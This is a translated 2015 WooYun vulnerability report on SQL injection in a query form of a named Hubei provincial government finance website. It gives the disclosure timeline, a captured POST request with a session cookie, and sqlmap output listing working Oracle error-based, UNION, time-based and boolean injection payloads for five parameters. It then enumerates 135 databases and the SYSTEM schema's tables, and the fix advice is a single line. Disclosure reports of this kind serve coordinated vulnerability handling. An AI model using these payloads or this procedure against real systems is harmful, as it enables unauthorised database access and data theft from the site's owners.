WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-07-24: Details reported to the vendor, awaiting vendor handling
2015-07-29: Vendor has confirmed; details disclosed to the vendor only
2015-08-08: Details disclosed to core white hats and domain experts
2015-08-18: Details disclosed to regular white hats
2015-08-28: Details disclosed to intern white hats
2015-09-12: Details disclosed to the public
Lately I have been finding a lot of POST injections; this is one of them.
Open the site:
http://www.hbcz.gov.cn
The right sidebar has a query form; locate the frame URL behind it:
http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087
Fill in the form and capture the request:
POST /XZQHQueryWAR/xxcx/loca_zjxx1.jsp HTTP/1.1
Host: www.hbcz.gov.cn:7001
Proxy-Connection: keep-alive
Content-Length: 104
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.hbcz.gov.cn:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/nrcx.jsp?code=421087&bkj=D421087
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=ySHDVsvSvqLVhQDxyLSQvJW22DLNQJ2jP7Ln99LnrTC1ntL0gCTM!337724127

class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1=++%B2%E9+%D1%AF++
Then I ran the table dump. The haul was considerable: not a single parameter is filtered.
Place: POST
Parameter: T2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=%' AND 1359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (1359=1359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

Place: POST
Parameter: class_ssort
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class_fovo=&class_ssort=%' AND 4861=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (4861=4861) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: class_fovo=&class_ssort=%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||CHR(77)||CHR(101)||CHR(66)||CHR(107)||CHR(89)||CHR(103)||CHR(107)||CHR(89)||CHR(69)||CHR(100)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL--

Place: POST
Parameter: T1
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l%' AND 5974=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5974=5974) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: class_fovo=&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l%' AND 2987=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(84)||CHR(81)||CHR(111),5) AND '%'='&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)

Place: POST
Parameter: class_fovo
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class_fovo=%' AND 5602=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5602=5602) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='&class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: class_fovo=%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||CHR(107)||CHR(107)||CHR(66)||CHR(89)||CHR(109)||CHR(70)||CHR(83)||CHR(117)||CHR(109)||CHR(112)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &class_ssort=&table=cz_fxgczj&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, [QUERY], NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL--

Place: POST
Parameter: table
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: class_fovo=&class_ssort=&table=cz_fxgczj' AND 7084=7084 AND 'SglX'='SglX&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: class_fovo=&class_ssort=&table=cz_fxgczj' AND 6640=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(105)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (6640=6640) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(100)||CHR(120)||CHR(119)||CHR(58)||CHR(62))) FROM DUAL) AND 'KlXg'='KlXg&D3=niandu&T1=l&D4=niandu&T2=&qhstr=D421087&B1= 查 询
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
available databases [135]:
One level down:
Database: SYSTEM
[183 tables]
Filter the input.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-07-29 09:39
CNVD has confirmed and reproduced the described situation; it has been passed through CNCERT to the Hubei branch center, which will coordinate handling with the website's administering unit.
None yet.